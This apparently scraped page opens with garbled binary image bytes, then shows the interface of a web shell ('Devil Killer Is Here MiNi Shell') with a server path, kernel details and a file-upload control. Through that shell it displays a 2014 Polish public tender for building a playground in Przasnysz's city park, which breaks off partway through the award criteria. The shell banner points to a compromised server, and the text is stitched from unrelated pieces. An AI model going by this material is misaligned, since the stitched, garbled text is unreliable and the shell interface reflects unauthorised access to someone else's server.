JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140626/214510-N-2014.html

<p class="kh_header"><b>Przasnysz: Budowa placu zabaw w Parku Miejskim im. Tadeusza Kościuszki w Przasnyszu.</b><br>
<b>Numer ogłoszenia: 214510 - 2014; data zamieszczenia: 26.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Przasnysz , ul. Jana Kilińskiego 2, 06-300 Przasnysz, woj. mazowieckie, tel. 029 7564900, faks 029 7564939.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.przasnysz.um.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placu zabaw w Parku Miejskim im. Tadeusza Kościuszki w Przasnyszu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z budową placu zabaw w zabytkowym Parku Miejskim im. Tadeusza Kościuszki w Przasnyszu wpisanym do rejestru zabytków pod numerem A-512 w ramach III etapu rewitalizacji. Plac zabaw przeznaczony jest dla dzieci w rożnych grupach wiekowych oraz o różnym stopniu sprawności fizycznej. Wyposażenie placu stanowią pojedyncze elementy sprzętu rekreacyjnego oraz jeden zestaw zabawowy, wraz nawierzchnią bezpieczną dostosowaną do wskaźnika WSU dla danych urządzeń oraz o nawierzchnią ruchu z trawy syntetycznej.
Zakres prac:
1)	Usunięcie drzewa wraz z karpą - 1 szt. 
2)	Usunięcie karpy - 1 szt.
3)	Obramowanie placu zabaw obrzeżem betonowym 6/20 na lawie betonowej - 60,60 mb 
4)	Podbudowa grubości 10 cm z piasku kopalnego - 180 m2
5)	Podbudowa z kruszywa łamanego frakcji 5 - 32 mm, grubość warstwy po zagęszczeniu 15 cm - 180 m2 
6)	Podkład z miału kamiennego frakcji 0-5 mm o gr. 3 cm - 52,20 m2
7)	Wykonanie nawierzchni bezpiecznych syntetycznych wylewanych dostosowanych grubością do wysokości swobodnego upadku dla poszczególnych urządzeń - 127,80 m2 
8)	Wykonanie nawierzchni ruchu pomiędzy strefami bezpieczeństwa z trawy syntetycznej z włókien fibrylowanych polietylenowych wraz z wypełnieniem piaskiem kwarcowym -52,20 m2, 
9)	 Wyposażenie placu w następujące urządzenia: zestaw zabawowe nr 1 - Wieża ze zjeżdżalnią, piramida linowa, bujaki na sprężynie (konik i motorek), podwójna huśtawka  z siedziskiem płaskim i kubełkowym, ławki bez oparcia, kosz na śmieci, tablica regulaminowa.  
10)	Uformowanie skarpy wokół placu zabaw o szerokości metrowego pasa  wraz  z obsianiem trawą - 60 m2      
11)	Serwisowanie placu zabaw w okresie rękojmi (jeden cykl konserwacyjny w roku)
Szczegółowy opis przedmiotu zamówienia w zakresie urządzeń zabawowych został przedstawiony w załączniku nr 1 do SIWZ Opis i wymagania urządzeń zabawowych

UWAGA!
Zamawiający przedstawił wizualizację (przykładowy wygląd, układ urządzeń) oraz parametry w jakich należy utrzymać elementy zabawowe składające się na przedmiot niniejszego zamówienia. Zamawiający dopuszcza nieznaczne odchylenia w parametrach oraz wyglądzie urządzeń zabawowych.
Wykonawca złączy do oferty wizualizację w postaci zdjęć lub rysunków w wersji papierowej bądź elektronicznej proponowanych urządzeń uwzględniając powyższe uwagi Zamawiającego.

  2.2  Wymagania Zamawiającego dotyczące urządzeń oraz nawierzchni:
1)	Wszystkie urządzenia przeznaczone do zamontowania na placu zabaw muszą być fabrycznie nowe i posiadać atesty i certyfikaty wydane przez jednostki certyfikujące, posiadające akredytacje polskiego Centrum Akredytacji, a także spełniać wymogi Polskich Norm i UE:
a)	PN-EN 1176-1:2009
b)	PN-EN 1176-2:2009
c)	PN-EN 1176-3:2009
d)	PN-EN 1176-5:2009
e)	PN-EN 1176-6:2009
f)	  PN-EN 1176-7:2009
g)	PN-EN 1176-10:2009
h)	PN-EN 1177:2009
2)	Powinny posiadać co najmniej 36 miesięczny okres gwarancji;
3)	Powinny być zgodne z Polskimi Normami oraz warunkami bezpieczeństwa określonymi w szczególności w przepisach o ogólnym bezpieczeństwie produktów .
4)	Powinny być rozmieszczony na placu zabaw w sposób umożliwiający zachowania bezpiecznych stref pomiędzy urządzeniami, określonych w dokumentacji dotyczącej utworzenia placu zabaw, w tym w projekcie placu zabaw.
5)	Wszystkie urządzenia powinny mieć certyfikaty bezpieczeństwa CE.
6)	Nawierzchnia z trawy syntetycznej:
a)	Wysokość całkowita nawierzchni 12-17 mm
b)	Gęstość - min. 39 900 włókien/m2 +- 10%,
c)	Ciężar Dtex - Min. 6 600 +-10%
d)	Wypełnienie piaskiem kwarcowym
UWAGA! Kolorystyka nawierzchni bezpiecznej do uzgodnienia z Zamawiającym 
Podczas realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do stosowania jedynie wyrobów dopuszczonych do używania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 165 poz. 1118 z późn. zm) oraz ustawy o wyrobach budowlanych (Dz. U. z 20014 r. Nr 92 poz. 881) oraz innych przepisów, o ile mają zastosowanie.
Przed przystąpieniem do robót zamawiający będzie wymagał od wykonawcy okazania n/w dokumentów dotyczących nawierzchni:
1)	 Badania na zgodność z normą PN-EN 1177 lub aprobata techniczna ITB lub rekomendacja techniczna ITB lub wynik badań specjalistycznych laboratorium badającego nawierzchnie sportowe np. Labosport
2)	Atest PZH dla oferowanych nawierzchni
3)	Karta techniczna oferowanych nawierzchni potwierdzona przez jej producenta
4)	Minimalny czas gwarancji udzielony przez producenta nawierzchni wynosi 36 miesięcy
2.3 Szczegółowo przedmiot zamówienia został określony w Rozdziale III Specyfikacji Istotnych Warunków Zamówienia, zwanej w dalszej treści również SIWZ lub specyfikacją   
2.4 Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji projektu i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
5.1	Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7.7.1994 r. Prawo budowlane (tj. Dz. U. z 2013 r. poz. 1409 ze zm.), rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich , robót budowlanych, badań konserwatorskich i architektonicznych, i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011 r. Nr 165 poz. 987)ustawie z dnia 29.1.2004 Prawo zamówień publicznych  t. j. Dz. U.2013, poz. 907ze zm.)  i ustawie  Kodeks cywilny (Dz. U. Nr 16 poz. 93 ze zm.)  oraz aktami wykonawczymi do tych ustaw. 
5.2	Wykonawca musi zapewnić wykonanie robót zgodnie z prawem polskim, a w szczególności z przepisami techniczno-budowlanymi, przepisami dotyczącymi samodzielnych funkcji technicznych w budownictwie oraz przepisami dotyczącymi wyrobów i materiałów stosowanych w budownictwie.
5.3	Wszystkie prace będą wykonywane w obszarze Parku Miejskiego im. Tadeusza Kościuszki wpisanego Decyzją Nr KL - 5340/20/84 Wojewódzkiego Konserwatora Zabytków do rejestru zabytków pod numerem A-512
6.	Podwykonawstwo   
6.1   Zamawiający zastrzega, że Wykonawca jest zobowiązany do osobistego wykonania kluczowych części zamówienia. Przez kluczowe części niniejszego zamówienia rozumie się  wykonanie 100% nawierzchni bezpiecznej.  Pozostałe części zamówienia Wykonawca  może powierzyć  podwykonawcom. 
6.2	Zastrzeżenie, o którym mowa w pkt. 6.1 nie jest skuteczne w zakresie w jakim Wykonawca  wykazując spełnienie warunków udziału w postępowaniu powołuje się  na wiedzę i doświadczenia innego podmiotu (podwykonawcy) na zasadach określonych w art. 26ust. 2b ustawy pzp. 
6.3	Zamawiający  wymaga aby wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, z uwzględnieniem zastrzeżenia, o którym mowa  wyżej. 
6.4	 W przypadku, gdy wykonawca powołuje się  - na zasadach określonych w art. 26 ust. 2b ustawy pzp -  w celu wykazania spełniania warunków udziału w postępowaniu -  na zasoby innych podmiotów (podwykonawców), którzy będą realizować część zamówienia , zobowiązany jest podać w ofercie  także nazwy tych podmiotów. 
6.5	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się- na zasadach określonych w art. 26 ust. 2b ustawy pzp -  w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest zobowiązany  udowodnić zamawiającemu, że inny proponowany podwykonawca, lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym, niż wymagany w trakcie postępowania.  
6.6	Powierzenie wykonania części zamówienia podwykonawcy (lub  dalszym podwykonawcom)  może nastąpić wyłącznie na podstawie Umowy Podwykonawstwa. 
6.5 Przez Umowę Podwykonawstwa rozumie się umowę w formie pisemnej o charakterze odpłatnym, której przedmiotem są roboty budowlane stanowiące część niniejszego zamówienia, zawartą między wybranym przez zamawiającego wykonawcą a podwykonawcą, a także między podwykonawcą a dalszym podwykonawcą dalszymi podwykonawcami.
6.6 Wymagania  Zamawiającego dotyczące Umowy Podwykonawstwa. 
1)	Umowa Podwykonawstwa  powinna być zawarta w formie pisemnej pod rygorem nieważności
2)	 Do zawarcia przez wykonawcę umowy o roboty budowlane z podwykonawcą jest wymagana zgoda Zamawiającego. 
3)	Umowa  podwykonawstwa może być zawarta tylko z podwykonawcą zaakceptowanym przez Zamawiającego
4)	Do zawarcia przez podwykonawcę umowy z dalszym podwykonawcą wymagana jest zgoda zamawiającego i wykonawcy
5)	Zawarta Umowa Podwykonawstwa  nie może zawierać postanowień  niezgodnych z treścią    zaakceptowanego  przez Zamawiającego  projektu umowy. 
6)	Termin zapłaty wynagrodzenia podwykonawcom i dalszym podwykonawcom nie może przekraczać 30 dni. 
7)	Postanowienia  w zakresie   zasad  rozliczenia , formy wynagrodzenia i  płatności podwykonawcom dalszym podwykonawcom muszą być spójne z postanowieniami umowy podstawowej zawartej pomiędzy zamawiającym i generalnym wykonawcą. 
8)	Procentowa wartość ostatniej części wynagrodzenia należnej podwykonawcom/ dalszym podwykonawcom nie może przekroczyć 10% 
9)	 Protokół odbioru robót budowlanych (częściowy końcowy) podpisany przez zamawiającego i wykonawcę  jest wystarczającym dowodem potwierdzającym wykonanie robót i  uprawniającym podwykonawcę/ dalszego podwykonawcę do wystawienia  faktury  za wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy roboty budowlanej, usługi lub  dostawy. Umowa podwykonawstwa  nie może zawierać  postanowień odmiennych w zakresie zasad  odbiorów  niż określone w  umowie podstawowej.   
10)	Zamawiający nie wymaga przedłożenia zawartych umów  podwykonawstwa , których przedmiotem są dostawy lub usługi  o wartości niższej niż 0,5 proc. wartości (brutto) kontraktu między zamawiającym a generalnym wykonawcą i jednocześnie nieprzekraczającej 30 tys. zł brutto. 
11)	Pozostałe zasady w zakresie podwykonawstwa regulują postanowienia umowy zawarte w SIWZ- Rozdz. IV.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6  ustawy pzp o wartości do 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.11.12.00-0, 45.00.00.00-7, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania  oceny  spełnienia warunków  w tym zakresie.  Zamawiający  dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia   na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga  aby Wykonawca wykazał, że w okresie 5 lat poprzedzających datę składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  wykonał (zakończył) co najmniej dwa zadania o wartości brutto 75.000,00 zł każde, obejmujące swym zakresem budowę/przebudowę/rozbudowę placu zabaw na terenie wpisanym do rejestru zabytków lub na obszarze objętym ochroną konserwatorką, w zakres których wchodziły następujące elementy robót: 
-wykonanie nawierzchni bezpiecznej lanej
-montaż urządzeń zabawowych
Wykonawcy wspólnie ubiegający się o udzielenie zmówienia (konsorcjum/spółka cywilna) powyższy warunek spełniają łącznie. Łącznie należy interpretować w ten  sposób, że każdy z wykonawców  może wykazać się realizacją   wymaganych zadań, a wykazanie się tą umiejętnością przez jednego z wykonawców zwalnia pozostałych z tego obowiązku. Sformułowania łącznie nie należy utożsamiać  z sumowaniem  wartości drobnych zamówień nie przekraczających minimalnego  progu określonego w opisie warunku  .
W przypadku kontraktów zawartych w walutach innych niż PLN, należy ich wartość  przeliczyć na PLN wg średniego kursu NBP z dnia podpisania kontraktu, podając datę podpisania umowy i kurs waluty. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W przypadku, gdy Wykonawca wykazując spełnianie warunku polega na wiedzy i doświadczeniu innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. (Treść zobowiązania wg formularza 2.6) 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia-nie spełnia  na podstawie załączonego do oferty wykazu robót . (Formularz Nr 2.4   Wiedza i Doświadczenie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania  oceny  spełnienia warunków  w tym zakresie.  Zamawiający  dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia   na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował  wykwalifikowaną kadrą, niezbędną do kierowania robotami stanowiącymi  przedmiot zamówienia.  Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się wymaganymi polskim prawem  uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie,  kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji, jakie zostaną im powierzone:
Wykonawca przedstawi wraz z  ofertą osoby na  funkcje wymienione poniżej, spełniające następujące wymagania:
(1)	 Kierownik budowy - 1 osoba. Wymagane uprawienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów oraz co najmniej 2 - letnią praktyka zawodowa na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego (Dz. U.2011.165.987). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia  powyższy warunek spełniają łącznie.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków na zasadach określonych w art. 26 ust. 2b ustawy Pzp. W przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na osobach zdolnych do wykonania zamówienia innych podmiotów , zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi osobami, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów   do oddania do dyspozycji Wykonawcy osób na okres ich udziału w wykonywaniu zamówienia, zawierające także listę osób, które zostaną przez ten podmiot udostępnione.
Uwaga!: 
Osoby posiadające zaświadczenia o kwalifikacjach, wydane na podstawie rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (Dz. U. Nr 31, poz. 197) oraz rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych warunkach ich prowadzenia i kwalifikacjach osób, które maja prawo prowadzenia tej działalności (Dz.U. Nr 16, poz. 55), zachowują uprawnienia wskazane w tych zaświadczeniach w dotychczasowym zakresie.

Zamawiający dokona oceny spełnienia tego warunku w formule spełnia -nie spełnia na podstawie  załączonego do oferty wykazu osób (Formularz  nr 2.5 Potencjał kadrowy - osoby zdolne do wykonania zamówienia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania  oceny  spełnienia warunków  w tym zakresie.  Zamawiający  dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia   na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z ofertą należy złożyć: 
Pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy względnie do podpisania innych dokumentów składanych  wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych  wraz z ofertą. 
Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
